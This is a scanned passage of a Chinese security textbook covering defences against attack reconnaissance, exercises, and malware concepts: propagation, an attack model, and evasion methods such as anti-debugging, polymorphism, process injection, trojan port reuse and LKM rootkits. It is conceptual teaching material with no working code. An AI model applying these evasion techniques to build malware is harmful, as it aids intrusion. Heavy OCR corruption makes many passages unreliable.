息 安 全 管理 日 益 得 到 重视 ,国际 上 已 经 有 公认 的 管理 标准 BS7799 ,该 标准 认为 信息 作为 一 
种 无 形 资 产 ,也 要 列 人 到 管理 当中 ,而且 要 分 类 管理 。 通 过 科学 的 信息 安全 管理 手段 ,可 以 
避免 信息 资产 无 序 保管 ,有 效 防 止 信息 资产 被 攻击 着 否 取 。 

6. 实施 主动 安全 防御 

传统 信息 安全 防御 方法 的 王 端 主要 存在 几 个 方面 ,如 不 足以 给 攻击 者 构成 威胁 或 损失 ， 
防御 策略 较为 固定 、 安 全 保护 目标 较为 静止 。 攻 击 者 反而 主动 地 选择 目标 ,能够 充分 掌握 目 
标 系统 的 信息 ,进而 从 中 选取 目标 最 溥 弦 的 环节 强行 攻 和 人 。 目 标 却 只 是 静止 地 等 竺 攻击 , 故 
防御 系统 对 攻击 者 产生 的 威胁 性 较 小 。 

积极 主动 安全 的 防御 方法 就 是 主动 出 击 , 对 攻击 者 行为 进行 干扰 ,如 攻击 诱骗 .入侵 检 
测 等 。 通 过 攻击 请 骗 能 够 使 攻击 者 有 所 拥 有 的 竣 源 被 消耗 ,攻击 者 的 工作 量 被 加 重 , 其 至 达到 
迷惑 的 效果 ,以 及 事先 掌握 .跟踪 并 有 效 地 制止 攻击 者 的 破坏 行为 ,对 攻击 者 产生 一 定 的 威 
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慑 力 。 据 人 研究 指出 ,网 络 攻击 准备 时 间 占 9526 ,而 攻击 时 间 只 占 5%。 其 中 ,攻击 准备 时 间 
的 40% 用 于 攻击 情报 信息 搜集 ,测试 验证 ,攻击 详 细 准 备 占 50%。 因 此 , 知 能 在 攻击 准备 阶 
段 实施 欺骗 ,就 能 够 有 效 地 干扰 攻击 痢 的 行为 ,影响 黑客 的 攻击 进程 。 目 前 已 开发 出 的 攻击 
V3 LH UIS Honeyd、DTK 等 。 利 用 Honeyd 可 以 伪装 虚假 的 多 种 汤 洞 信息 ,其 骗 攻 击 
者 ,如 图 4-6 所 示 。 


Internet 








Linux | FreeBSD 3.2-4.0 Windows NT4 NetBSD 1.6H 
pip. 10.0.0.102 10.0.0.103 10.0.0.104 


4-6  Honeyd 软件 应 用 示意 图 


除了 主动 实施 攻击 欺骗 外 ,入 侵 检 测 也 可 以 用 来 及 时 发 现 信 息 网 络 中 的 非法 收集 攻击 
信息 行为 ,典型 的 入 侵 检 测 工 具 软 件 有 Snort、Scanlogd F. 

7. 部 署 屏 蔽 攻击 扫描 产品 

针对 黑客 收集 目标 信息 行为 , port80 software 公司 开发 了 产品 ServerMask。 运 行 
ServerMask 后 ,会 移 走 许多 不 需要 啊 应 的 信息 ,在 一 定 程度 上 可 以 对 抗 扫描 工具 对 目标 系 
统 的 信息 扫描 。 "T: ServerMask 后 [al IM BE iic dut AS 28 St 1S 


4.8 MHEN 


XTA I8] 25782 AH a OR HH AR Il B9 Dj; vo, E Wr Sj p; du. LA B AS T B; vo e 25 3H di H0 
Jrik. 

(D 防范 主动 扫描, 可 通过 减少 开放 闯 口 、 做 好 系统 防护 、 实 时 监测 扫 摘 、 及 时 做 出 告 
He TN ee Al m O AE TT fri SA ST 14 3: EH H3 

(2) Bj v8. 8E 5I FA f ERST. EH TE BREED THAI IL BEL AGA EY) RB HS EST ECC Dj 
WIT ik HUBER Hide s BOX — PRU IA. 
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(3) BR Y ERX E DFA fi HL C2] 3-1 Fit BJ Jj v, 73 1 A. x6 PT DA SE TES FH BJ; Ket A Be UI, 
SGH Ui Ind P h S BEN B HEX $1 ec 3H 18 89 H H3 

使 用 防火 墙 技术 ,人 允许 内 部 网 络 接 入 外 部 网 络 ,但 同时 又 能 识别 和 抵抗 非 授 权 访 问 ; 入 
侵 检测 技术 ,可 以 发 现 未 经 授权 非法 使 用 计算 机 系统 的 个 体 或 合法 访问 系统 但 滥用 其 权限 
的 个 体 ; 审计 技术 ,可 对 系统 中 任意 或 所 有 的 安全 事件 进行 记录 、 分 析 和 上 再现; 使 用 访问 控 
制 技术 ,可 对 主体 访问 客体 的 权限 或 能 力 进 行 限制 。 


4.9 AU 


攻击 目标 信息 的 搜集 是 实施 信息 网 络 系统 攻击 的 重要 环节 之 一 ,墨客 通过 目标 的 信息 
收集 和 分 析 , 从 中 发 现 可 以 利用 的 人 侵 途 径 。 对 于 防守 者 来 说 ,应 设法 最 小 化 又 露 有 价值 的 
信息 给 攻击 者 ,从 而 可 以 延缓 攻击 进程 ,甚至 可 以 阻止 攻击 进展 。 本 曹 首 先 分 析 了 攻击 者 进 
行 信息 收集 的 理念 ,过程 . 类 型 以 及 途径 。 然 后 具体 叙述 了 UNIX ZR. Windows 系统 、 网 
络 应 用 服务 等 信息 的 获取 方法 和 典型 工具 。 同 时 , 较 深层 次 地 分 析 信 息 收 集中 共性 技术 方 
法 ; 最 后 ,针对 攻击 信息 收集 行为 ,给 出 7 个 方面 的 防 艺 方法 和 相应 的 工具 。 


习题 4 


1. 下 列 TCP 扫描 不 带 任 何 标志 位 的 是 ( js 

A. SYN 扫描 B. ACK 扫描 C. FIN 扫描 D. NULL 扫描 
2. 漏洞 扫 摘 攻击 和 端口 扫 摘 攻击 端口 之 间 的 关系 是 ( ) 。 

A. 漏洞 扫描 攻击 应 该 比 端 口 扫描 攻击 更 早 发 生 

D. 漏洞 扫 摘 攻击 应 该 和 端口 扫 摘 攻击 同时 发 生 

C. 漏洞 扫 撒 攻击 应 该 比 端口 扫描 攻击 更 晚 发 生 

D. 漏洞 扫描 攻击 与 端口 扫描 攻击 没有 关系 
3. 庙 口 扫描 是 一 种 ( ) 型 网 络 攻击 。 

A. DoS B. 利用 C. 信息 收集 D. 虚假 信息 
4. 设计 一 个 端口 扫描 需 , 可 以 实现 用 户 输入 IP 地 址 及 端口 范围 。 


BOS VA dT iT 


5.1 AA AR TU 


5.1.1 RBRBHENX 


计算 机 病毒 是 早期 主要 形式 的 恶意 代码 。 在 20 世纪 80 年 代 , 计 算 机 病 
毒 媳 生 , 它 是 早期 恶意 代码 的 主要 内 容 ,由 Adleman 命名 、Cohen 设计 出 的 一 
种 在 运行 过 程 中 具有 复制 上 月 身 功 能 的 破坏 性 程序 。 在 这 之 后 ,病毒 被 
Adleman 定义 为 一 个 具有 相同 性 质 的 程序 集合 ,只 要 程 序 具 有 和 破坏、 传染 或 
模仿 的 特点 ,就 可 认为 是 计算 机 病毒 。 这 种 定义 使 得 病毒 内 涵 被 赋 子 了 扩大 
化 的 倾 回 ,将 任意 市 有 破坏 性 的 程序 部 认为 是 病毒 ,掩盖 了 病毒 潜伏 、 传 染 等 
其 他 重要 特征 。20 世纪 90 年 代 末 , 随 看 计算 机 网 络 技术 的 发 展 进步 ,恶意 代 
i4 (Malicious Code) AYE Sth RIK BD FEF ey LOK KRG HK Grimes XE 
义 为 从 一 合计 算 机 系统 到 为 外 一 人 台 计 算 机 系统 未 经 授权 认证 ,经 过 存储 介质 
和 了 网络 进行 传播 的 破坏 计算 机 系统 完整 性 的 程序 或 代码 。 计 算 机 病毒 
(Computer Virus) , 5j; E (Worms) .特洛伊 木马 (Trojan Horse), 逻辑 炸弹 
(Logic Bombs) . 3A Fi (Bacteria) .用户 级 Rootkit. 核心 级 RootKit MARS 
代码 (Malicious Scripts) 和 恶意 Active X 控件 等 都 属于 恶意 代码 。 

因此 可 以 总 结 出 恶意 代码 两 个 显著 的 特点 : 非 授 权 性 和 破坏 性 。 表 5-1 
列举 了 恶意 代码 的 几 个 主要 类 型 及 关于 其 和 月 身 的 定义 说 明和 特点 。 


5.1.2 Em RB XE 


A ek | Vd [Ro] ell AN [HL E Jl SL A AR HH BOB 28 Dr dU 3508. Bl RAY 
安全 产生 了 严重 的 威胁 。 目 前 国际 上 一 些 发 达 国 家 都 投入 大 量 资 金 和 人 力 
对 恶意 代码 领域 的 问题 进行 了 长 期 深度 的 研究 ,同时 在 茶 种 程度 上 取得 了 了 显 
着 的 扩 术 成 采 。1991 年 的 海湾 成 争 dS RGB «DL es E PA SC HS T ED DL 
美国 植 和 人 了 可 远程 控制 的 恶意 代码 ,这 使 得 战争 还 没 打 啊 之 前 就 造成 了 伊 拉 
殉 整 个 计算 机 网 络 管理 的 雷达 预 瞧 系统 全 部 瘫痪 。 这 是 美国 第 一 次 公开 在 
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表 5-1 主要 恶意 代码 的 相关 定义 
恶意 代码 类 型 相关 定义 说 明 特 OKA 
指 编制 或 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 毁坏 数据 、 


影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 程序 代码 AS FOROR 


计算 机 病毒 


计算 机 蠕虫 指 通过 网 络 自 我 复制 ,消耗 系统 和 网 络 资源 的 程序 扫描 ,攻击 和 扩散 
特洛伊 木马 指 一 种 与 连接 远程 计算 机 通过 网 络 控制 本 地 计算 机 的 程序 JA di , ES ke #0 fs 23 HX 
ta — Bt ATTE RL A St TE PY AY 38 ERE BY HB AY f] PE 2 R 


ERER 件 完成 破坏 功能 的 程序 ee 
- STRUT RERTGREM 和 传播 "以 消耗 系统 资源 为 目的 | An 
7d nuuc, | 指 通 过 将 代 或 修改 被 执行 的 程序 进入 系统 ,从 而 实现 隐 基 和 他 | 人 





建 后 门 的 程序 


核心 级 RootKit | 指 艇 入 操作 系统 内 核 进 行 隐藏 和 创建 后 门 的 程序 Est i PE TR 


实战 中 利用 恶意 代码 攻击 技术 获得 的 重大 车 事 利 益 。 在 Internet 安全 事件 中 ,由 恶意 代码 
X JB ASF RA t — Ai o 


5.1.3 恶意 代码 存在 原因 


计算 机 技术 发 速 发 展 的 同时 并 未 使 系统 的 安全 性 得 到 增强 。 计 算 机 技术 的 进步 市 来 的 
安全 增强 能 力 最 多 只 能 对 由 应 用 环境 的 复杂 性 市 来 的 安全 威胁 的 增长 程度 进行 一 定 的 弥 
补 。 除 此 之 外 ,计算 机 新 技术 的 出 现 或 许 会 让 计算 机 系统 的 安全 性 降低 。AT&TT 实验 室 的 
S. Bellovin 曾经 对 美国 CERT 提供 的 安全 报告 进行 过 分 析 , 分 析 结 果 表 明 , 大 约 50% 的 计 
算 机 网 络 安全 问题 是 由 软件 工程 中 产生 的 安全 缺陷 引起 的 ,其 中 ,很 多 问题 的 根源 都 来 目 操 
TE AR BEN ESSE 

互联 网 的 飞速 发 展 成 为 恶意 代码 广泛 传播 成 长 的 温室 。 互 联网 上 月 身 的 开放 性 ,缺乏 中 
心 控制 性 和 全 局 视图 能 力 的 特点 ,使 得 网 络 主机 处 在 一 个 受 不 到 统一 保护 的 环境 中 。 
Bellovin 等 认为 计算 机 和 网 络 系 统 日 号 存在 的 设计 缺陷 ,会 导致 安全 隐患 的 发 生 。 

针对 性 是 恶意 代码 的 主要 特征 之 一 , 即 特定 的 脆弱 点 的 针对 性 ,这 充分 说 明了 恶意 代码 
实现 其 恶意 目的 正 是 建立 在 软件 的 脆弱 性 基础 上 的 。 历 史上 产生 广泛 影响 的 1988 年 
Morris 蠕虫 事件 ,入侵 的 最 初 突破 点 就 是 利用 的 邮件 系统 的 脆 弱 性 。 

虽然 人 们 做 了 诸多 努力 来 保证 系统 和 网 络 基 础 设施 的 安全 ,但 令 人 遗憾 的 是 ,系统 的 脆 
弱 性 仍然 无 法 避免 。 各 种 安全 措施 只 能 减少 ,但 不 能 杆 绝 系统 的 脆弱 性 ; 而 测试 手段 也 只 
能 证 明 系 统 存在 脆弱 性 , 却 无 法 证 明 系 统 不 存在 脆弱 性 。 更 何况 ,为 了 实际 需求 的 满足 , 信 
息 系 统 规模 的 逐渐 扩大 ,会 使 安全 脆弱 性 的 问题 越 来 越 明 显 。 随 着 逐步 发 现 这 些 脆弱 性 , 针 
对 这 些 脆弱 性 的 新 的 恶意 代码 将 会 层出不穷 。 

总 体 来 讲 , 许 多 不 可 避免 的 安全 问题 和 安全 脆弱 性 存在 于 信息 系统 的 各 个 层次 结构 中 ， 
包括 从 的 层 的 操作 系统 到 上 层 的 网 络 应 用 在 内 的 各 个 层次 。 这 些 安 全 脆弱 性 的 不 可 避免 ， 
也 是 恶意 代码 必然 存在 的 原因 。 


5.1.4 恶意 代码 传播 与 发 作 


如 今 的 信息 社会 ,信息 共享 是 大 势 所 趋 ,而 恶意 代码 人 侵 最 常见 的 途径 则 是 信息 共享 引 
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起 的 信息 流动 。 恶 意 代 码 的 人 侵 途 径 各 种 各 样 , 如 从 Internet 上 下 载 的 程序 日 身 也 许 就 市 
有 恶意 代 但 .接收 已 经 感染 恶意 代码 的 电子 邮件 .从 光盘 或 软盘 同系 统 上 安 释 携 市 恶意 代码 
的 软件 .黑客 或 攻击 肴 故意 将 恶意 代码 植 人 系统 等 。 

通过 用 户 执 行 该 恶意 代码 或 已 被 恶意 感染 的 可 执行 代码 ,从 而 使 得 恶意 代码 得 以 执行 ， 
进而 将 日 号 或 目 身 的 变 体 植 人 其 他 可 执行 程序 中 ,就 造成 了 恶意 代码 感染 。 被 执行 的 恶意 
代码 在 完成 上 月 身 传 播 . 具 有 足够 的 权限 并 满足 茶 些 条 件 时 , 驶 会 发 作 同 时 进行 破坏 活动 , 造 
成 信息 丢失 或 泄密 等 。 

亚 意 代码 的 人 侵 和 发 作 需 要 在 盗用 系统 或 应 用 进程 的 合法 权限 基础 上 才 可 以 实现 。 随 
着 Internet 开放 程度 越 来 越 蜗 ,信息 共 圣 和 交流 也 越 来 越 强 , 防 意 代码 编写 水 平 也 越 来 越 
局 ,可 镁 恶意 代 人 码 利 用 的 系统 和 网 络 的 脆弱 性 也 越 来 越 多 ,从 而 使 悉 意 代码 越 来 越 具 有 欺骗 
性 和 隐蔽 性 。 重 要 的 是 ,新 的 恶意 代码 总 是 在 恶意 代码 的 检测 技术 前 出 现 , 这 也 就 古 由 
Cohen 和 Adelman 提出 的 “有 恶意 代码 通用 检测 方法 的 不 可 判定 性 ”的 绪论。 前 先 人 们 很 难 
将 正常 代码 和 有 恶意 代码 区 别 开 , 其 次 对 许多 信息 系统 没有 必要 的 保护 措施 。 所 以 ,人 们 和 经委 
OX 25 x3. CAS Bt ae ilic «fi AE TG ES P UG. Y SERVIS. FE CERT 统计 数据 中 ,其 中 因 被 欺 鸡 
a i FM rf Ac ^E BS os EARB SE PE XA ILE ARTIS SER 9026, R AE LE OR PE BUB AE sous 
XII ML AE ,甚至 大 规模 传播 。 

虽然 越 来 越 多 的 恶意 代码 安全 事件 通过 Internet RAE ,但 是 恶意 代码 却 早 就 已 经 出 现 。 
多 年 来 ,攻击 者 怪力 于 对 具有 更 强攻 击 能 力 和 生存 能 力 的 恶意 代 人 码 的 研究。 


5.1.5 EH SE d deny 


恶意 代码 行为 各 不 相同 ,破坏 程度 也 不 尽 相 同 , 但 它们 的 作用 机 制 基 本 大 臻 相同 ,作用 
过 程 可 大 概 分 为 6 个 部 分 。 

(侵入 系统 。 恶 意 代码 实现 其 恶意 目的 的 第 一 步 必 人 然 是 人 侵 系 统 。 恶 意 代码 侵入 系 
统 有 许多 途径 ,如 从 互联 网 下 载 的 程序 其 日 身 也 许 就 市 有 恶意 代码 、 接 收 了 已 被 恶意 感染 的 
电子 邮件 .通过 光盘 或 软盘 在 系统 上 安放 的 软件 .攻击 者 故意 植 人 系统 的 恶意 代码 等 。 

O 维持 或 提升 已 有 的 特权 。 恶 意 代 码 的 传播 与 破坏 需要 建立 在 盗用 用 户 或 进程 的 权 
限 合 法 的 基础 之 上 。 

O 隐蔽 策略 。 为 了 隐蔽 已 经 人 侵 的 恶意 代码 ,可 能 会 对 亚 意 代码 进行 改名 、 删除 源 文 
件 或 修改 系统 的 安全 策略 。 

D 潜伏 。 亚 意 代 码 侵 和 人 系统 后 ,在 具有 足够 的 权限 并 满足 某 些 条 件 时 ,就 会 发 作 同 时 
进行 破坏 活动 。 

O 破坏 。 亚 意 代 码 具 有 破坏 性 的 本 质 ,为 的 是 造成 信息 丢失 .泄密 ,系统 完整 性 被 破 

© 重复 山 一 四 对 新 的 目标 实施 攻击 过 程 。 有 恶意 代码 的 攻击 模型 如 图 5-1 所 示 。 

恶意 代码 的 攻击 过 程 可 以 存在 于 恶意 代码 攻击 模型 中 的 部 分 或 全 部 。 例 如 ,路 思 @ 
存在 于 计算 机 病毒 行为 ,中 四 四 和 存在 于 网 络 晴 虫 ,中 加 田 四 存在 于 特洛伊 木马 40) 009) 
存在 于 逻辑 炸弹 ,中 加 四 存在 于 病菌 ,中国 归 加 存在 于 用 户 级 Rootkit, COO O ff TE FE 
心 级 RootKit, 其 他 的 恶意 代码 行为 也 可 以 映射 到 模型 中 的 相应 部 分 ,其 中 中 和 名 是 必 不 
可 少 的 。 


69 
第 5 章 恶意 代码 攻击 机 理 分 










确定 攻击 目标 NM 
搜集 目标 信息 恶意 代码 
(6) 
重复 全 -~ 全 
否 
RAR WMI 
是 





未 得 一 般 用 户 权限 @@ 实施 隐藏 策略 @ I < 人 KERRO 


Rm 


贿 暴 超级 用 户 权限 名 实施 破坏 行为 名 





5-1 恶意 代码 的 攻击 模型 
5.2 恶意 代码 生存 拉 术 


1. 反 跟 踪 技 术 

亚 意 代码 徘 采用 反 跟 踩 技术 来 提高 日 身 的 伪 讼 能力 和 防 破 诺 能 力 , 使 检测 与 清除 恶意 
代码 的 难度 大 大 增加 。 反 跟踪 技术 大 致 可 以 分 为 两 大 类 : Bo AS BRB FRR A Ss AS OP OT 
ER. 

1) 反动 态 跟 踪 技 术 

(1) 禁止 跟 踊 中 断 。 恶 意 代 码 通 过 修改 程序 的 入 口 地 址 对 调试 分 析 工 具 运 行 系统 的 单 
步 中 断 与 断 点 中 断 服 务 程 序 来 实现 其 反 跟 踩 的 目的 。 

(2) 封锁 键盘 输入 和 屏 失 显示 ,使 跟 足 调试 工具 运行 的 必需 环境 被 破坏 。 

(3) 检测 跟 踊 法 。 根 据 检 测 跟 踊 调 试 和 正常 执行 二 者 的 运行 环境 、 中 断 入 口 和 时 间 不 
同 , 各 有 自 采取 相应 的 措施 实现 其 反 跟 踊 目 的 。 

(4) 其 他 技术 ,如 指令 流 队 列 法 和 逆 指 令 流 法 等 。 

2) J BRAS OP TAR AR 

CD 对 程序 代码 分 块 加 密 执 行 。 为 了 不 让 程序 代码 通过 反 汇 编 进行 静态 分 析 , 将 以 分 
块 的 程序 代码 以 密 文 形式 滩 入 内 存 ,; 由 解密 程序 在 执行 时 进行 详 码 ,立即 清 际 执行 完毕 后 的 
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代码 ,力求 分 析 者 在 任何 时 候 都 无 法 从 内 存 中 获得 执行 代码 完整 形式 。 

(2) 伪 指 令 法 。 伪 指令 法 是 指 将 “ 废 指 令 ” 插 入 指令 流 中 ,让 静 态 反 汇编 得 不 到 全 部 正 
常 的 指令 ,进而 不 能 进行 有 效 的 静态 分 析 。 例 如 , Apparition 是 一 种 基于 编译 器 变形 的 
Win32 平台 的 病毒 ,每 次 新 的 病毒 体 可 执行 代码 被 编译 器 编译 出 时 要 被 插入 一 定数 量 的 伪 
指令 ,不仅 使 其 变形 ,而 且 实 现 了 反 跟 踊 的 目的 。 不 仅 如 此 ,该 技术 还 在 宏 病 毒 与 脚本 恶意 
代码 中 应 用 广泛。 

2. 加 密 技术 

加 密 技 术 是 恶意 代码 进行 自我 保护 的 手段 之 一 ,再 配合 反 跟 中 技术 的 使 用 ,让 分 析 者 不 
能 正常 分 析 调 试 恶 意 代 码 ,无 法 获得 工作 原理 ,自然 也 不 能 抽取 特征 串 。 从 加 密 的 内 容 上 划 
分 ,加 密 手 段 有 3 种 , 即 信 息 加 密 、 数 据 加 密 和 程序 代码 加 密 。 大 部 分 恶意 代码 对 程序 体 本 
身 加 密 , 但 还 是 有 少数 恶意 代 公 对 被 感染 的 文件 加 密 。 例 如 ,Cascade 是 DOS 环境 下 采用 
加 密 技 术 的 恶意 代码 的 第 一 例 。 解 密 问 稳定 ,能 够 使 内 存 中 加 密 的 程序 体 被 解密 。Mad 和 
Zombie 是 Cascade 延伸 了 加 密 搁 术 , 让 恶意 代码 加 秘技 术 扩 展 到 32 位 的 操作 系统 平台 。 
不 仅 如 此 ,“ 中 国 炸 弹 ” 和 “了 幽灵 病毒 ”也 是 这 一 类 恶意 代码 。 

3. 模糊 变换 技术 

在 感染 一 个 客体 对 象 时 ,恶意 代码 利用 模糊 变换 技术 生成 的 港 入 代码 都 不 尽 相 同 。 尽 
管 是 同一 种 恶意 代码 但 仍 会 具有 很 多 不 相同 的 样本 ,几乎 不 存在 稳定 代码 ,仅仅 是 基于 特征 
的 检测 工具 通常 不 能 有 效 识 别 它们 。 随 着 恶意 代码 的 不 断 发 展 ,病毒 检测 和 防御 软件 的 代 
码 编 写 越 来 越 难 , 反 病 毒 软件 的 误 报 率 也 随 之 增加 。 

目前 ,模糊 变换 技术 主要 分 为 以 下 几 种 。 

CD 指令 替换 技术 。 模 糊 变 换 引 擎 (Mutation Engine) 对 恶意 代码 的 二 进 制 代码 反 汇 
编 ,解码 并 计算 指令 长 度 ,再 对 其 同 义 变换 。 例 如 ,指令 “XOR REG,REG” 被 变换 为 “SUB 
REG ,REG”; 寄存 器 REGI 和 寄存 器 REG2 互 换 ; JMP 指令 和 CALL 指令 变换 等 。 例 如 ， 
“Regswap ”使 用 了 寄存 冀 互 换 这 一 变形 技术 。 

(2) 指令 压缩 技术 。 经 恶意 代码 反 汇 编 后 的 全 部 指令 由 模糊 变换 帮 检 测 , 对 可 压缩 的 指 
令 同 义 压 织 。 上 压缩 技术 要 想 使 病毒 体 代 码 的 长 度 发 生 改 变 ,必须 对 病毒 体内 的 跳 转 指令 重 定 
位 。 例 如 ,指令 “MOV REG,12345678 / PUSH REG” 变 换 为 指令 “PUSH 12345678” 等 。 

(3) 指令 扩展 撤 术 。 扩 展 技术 对 汇编 指令 同 义 扩展 ,所 有 经 过 压缩 技术 变换 的 指令 都 
能 够 使 用 扩展 技术 来 进行 逆 变 换 。 扩 展 技 术 远 比 压 缩 技术 可 变换 的 空间 要 大 ,甚至 指令 能 
够 进行 几 十 或 上 百 种 的 扩展 变换 。 扩 展 技 术 也 需要 对 恶意 代码 的 长 度 进行 改变 ,进行 恶意 
代码 中 跳 转 指令 的 重 定 位 。 

(4) 伪 指 令 技术 。 伪 指令 技术 主要 是 将 无 效 指令 插入 到 恶意 代码 程序 体 , 如 空 指令 ，。 

(5) HE EE TEN. fi HIR A PESCA. ,利用 日 市 编译 旨 或 操作 系统 提供 的 编译 带 , 将 恶意 
代码 重新 编译 为 代码 形态 不 同 的 新 恶意 代码 ,这 种 技术 不 仅 实 现 了 变形 目的 ,而 且 为 跨 平台 
的 实现 提供 了 和 条件。 这 表现 在 UNIX/Linux 操作 系统 ,系统 默认 配置 有 标准 C. BY Ba PE a o 
宏 病 毒 和 脚本 恶意 代码 是 采用 这 类 技术 变形 的 代表 性 恶意 代码 。 

Tequtla 是 第 一 例 在 全 球 范 于 传播 破坏 的 变形 病毒 ,从 其 出 现 到 人 研发 出 可 以 有 效 检 测 
该 病毒 的 软件 ,研究 人 员 一 共用 了 97H. 
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模糊 变换 技术 是 恶意 代码 更 好 生存 的 有 效 方法 之 一 ,是 如 今 人 研究 恶意 代码 的 关注 点 。 

4. 自动 生产 技术 

恶意 代码 自动 生产 技术 基于 人 工分 析 技 术 。 即 使 在 这 方面 零 基础 的 人 也 能 利用 “计算 
机 病毒 生成 天 ”组合 出 算法 .功能 各 不 相同 的 计算 机 病毒 。 普 通病 毒 能 够 利用 “多 态 性 发 生 
融 " 编 详 成 具有 多 态 性 的 病毒 。 多 态 变 换 引 擎 能 够 让 程序 代码 本 号 产 生 改 变 ,但 却 可 以 你 持 
原 有 功能 。 例 如 ,保加利亚 的 Dark Avenger, 变 换 引 擎 每 产生 一 个 恶意 代码 ,其 程序 体 都 会 
发 生 概 化 。 反 恶意 代码 软件 大 只 是 及 用 基于 特征 的 扫 摘 技术 , 则 无 法 检测 和 清除 这 种 恶意 
代码 。 

5. 变形 技术 

在 恶意 代码 的 查 杀 过 程 中 ,多 数 杀 毒 厂 商 通过 提取 恶意 代码 特征 值 的 方式 对 恶意 代码 
进行 分 辨 。 需 要 一 个 特征 代码 库 是 基于 特征 码 的 病毒 查 杀 技术 的 致命 缺点 ,同时 这 个 库 中 
的 代码 要 具有 固定 性 。 病 毒 设计 者 利用 这 一 汤 洞 ,设计 出 具体 同一 功能 不 同 特征 码 的 恶意 
代码 。 将 这 种 变换 恶意 代码 特征 码 的 技术 称 为 变形 技术 。 篆 见 的 恶意 代码 变形 技术 包括 以 
下 几 种 。 

(1) 重 汇编 技术 : 变形 引擎 对 病毒 体 的 二 进 制 代 码 进 行 反 汇编 ,解码 每 一 条 指令 ,并 对 
指令 进行 同 义 变换 。 例 如 ,Regswap 就 是 采用 简单 的 寄存 器 互 换 的 变形 。 

(2) 压缩 技术 : 变形 需 检 测 病 毒 体 反 汇编 后 的 全 部 指令 ,对 可 进行 压缩 的 一 段 指令 进 
行 同 义 压 缩 。 

(3) ERRER: 压缩 技术 的 逆 变 换 就 是 对 汇编 指令 同 义 脱 胀 。 

(4) Dis S AUR: 伪 指 令 技 术 主 要 是 对 病毒 体 插入 废 指令 ,如 空 指 令 、 跳 转 到 下 一 指令 
和 压 弹 栈 等 。 

(5) 重 编译 技术 : 病毒 体 携带 病毒 体 的 源码 ,需要 自 带 编译 器 或 利用 操作 系统 提供 的 
编 详 硕 进 行 重新 编 详 。 这 为 蜂 平 台 的 恶意 代码 出 现 打 下 了 基础 。 

6. 三 线程 技术 

恶意 代码 中 应 用 三 线程 技术 是 为 了 防止 恶意 代码 被 外 部 操作 停止 运行 。 当 一 个 恶意 代 
码 进程 同时 开启 了 3 个 线程 ,其 中 一 个 为 负责 远程 控制 的 工作 的 主线 程 ,另外 两 个 为 用 来 监 
视线 程 负 责 检 查 恶 意 代 码 程 序 是 人 否 被 删除 或 被 停止 月 司 动 的 监视 线程 和 守护 线程 ,这 是 它 
的 工作 原理 。 注 人 其 他 可 执行 文件 内 的 守护 线程 ,同步 于 恶意 代码 进程 。 只 要 进程 被 停止 ， 
它 就 会 重新 启动 该 进程 ,同时 问 主 线程 提供 必要 的 数据 ,这 样 就 使 得 恶意 代码 可 以 持续 运 
行 。“ 中 国 黑 客 ” 就 是 采用 这 种 技术 的 恶意 代码 。 

7. 进程 注入 技术 

在 系统 启动 时 ,操作 系统 的 系统 服务 和 网 络 服务 一 般 能 够 日 动 加 载 。 恶 意 代码 程序 为 
了 实现 隐藏 和 局 动 的 目的 ,把 和 月 身 艇 人 到 与 有 关 这 些 服务 的 进程 中 。 这 类 恶意 代码 只 需要 
安放 一 次 ,就 能 被 服务 硕 加 载 到 系统 中 运行 ,并 且 可 以 一 直 处 于 活路 状态。Windows 下 的 
大 部 分 关键 服务 程序 能 够 被 WinEggDropShell FA. 

8. 通信 隐藏 技术 

实现 恶意 代码 的 通信 隐 器 技术 一 般 有 三 类 实现 方法 : 端口 定制 技术 .通信 加 密 技 术 和 
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NS XX. Bh Is E A hy FH 
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优点 : ARES UM TE BS — RUE DU 77 135 89, 22 For DU A Yu A, XE. il V A RT LA XE 33 JC 73 1 IP] 
检测 。 


端口 复 用 技术 利用 系统 网 络 打开 的 端口 (如 25 和 139 等 ) 传 送 数据 。 木 马 Executor 用 
80 闪 口 传递 控制 信息 和 数据 ; Blade Runner, Doly Trojan, Fore, FTP trojan, Larva, ebEx, 
inCrash 等 木马 复 用 21 HO; Shtrilitz Stealth, Terminator, WinPC, WinSpy 等 木马 复 用 25 
Ming Ll. EH m O EHER AR D dE DI US IH SATA IR 2$ 1E S LTERJZRTE PR HI RA IR 08 80 


A Oa PE, nm Ua [77 A d x mx e. npud IDS 和 安全 扫描 系统 等 安全 工具 。 


(2) 通信 加 蜜 技术, 即将 恶意 代码 的 通信 内 容 加 密 发 送 。 通 信 加 密 技 术 胜 在 能 够 使 得 
XE fri VE Es ek» BE ig AE FOIA Des elk OBS fr DA s o 

(3) Be ROBE Dx 7N Be A 2C Bei e aH fri ZS AGH fri A ex «EL BU A, EP] BE He D Det Mal GE 7J X. 
进行 通信 的 后 门 有 BO2K.,Code Red l| , Nimida 和 Covert TCP 等 。 但 恶意 代码 编写 者 需 
要 耗费 大 量 时 间 以 便 找 寻 隐 蔽 通道 

9. 内 核 级 隐藏 技术 

(D LKM 隐藏 。LKM, 详 为 可 加 载 内 核 模块 ,用 来 扩展 Linux 内 核 功 能 。LKM 能 够 
在 不 用 重新 编译 内 核 的 情况 下 把 动态 加 载 到 内 存 中 。 基 于 这 个 优点 ,LKM 技术 经 党 使 用 
在 系统 设备 的 驱动 程序 和 Rootkit 中 。 

LKM Rootkit 技术 能 通过 系统 提供 的 接口 ,将 外 部 代码 加 载 到 内 核 空 间 ,即将 恶意 程 
序 转 化 为 内 核 的 某 一 部 分 ,再 通过 hook 系统 调用 的 方式 实现 隐藏 功能 。 

(2) 内 存 映 射 隐藏 。 内 存 映 射 是 指 由 一 个 文件 到 一 块 内 存 的 映 册 。 文 件 映 射 使 得 可 以 
将 硬盘 上 的 内 容 映 射 至 内 和 存 中 ,用 户 可 以 通过 内 存 指 令 读 与 文件 。 使 用 内 存 映 射 避免 了 多 
次 调用 L/O 操作 的 行为 ,减少 了 不 必要 的 资源 浪费 。 


5.3 ”恶意 代码 攻击 技术 


1. 进程 注入 技术 

当 系 统 启动 时 ,系统 服务 和 网 络 服务 在 操作 系统 中 被 自动 加 载 。 进 程 注 入 技术 就 是 将 
这 些 与 服务 相关 的 般 入 了 恶意 代码 程序 本 身 的 可 执行 代码 作为 载体 ,实现 自身 隐藏 和 启动 
的 目的 。 这 类 恶意 代码 只 需要 安装 一 次 ,就 能 被 服务 加 载 到 系统 中 运行 ,并 且 可 以 一 直 处 于 

2. 超级 管理 技术 

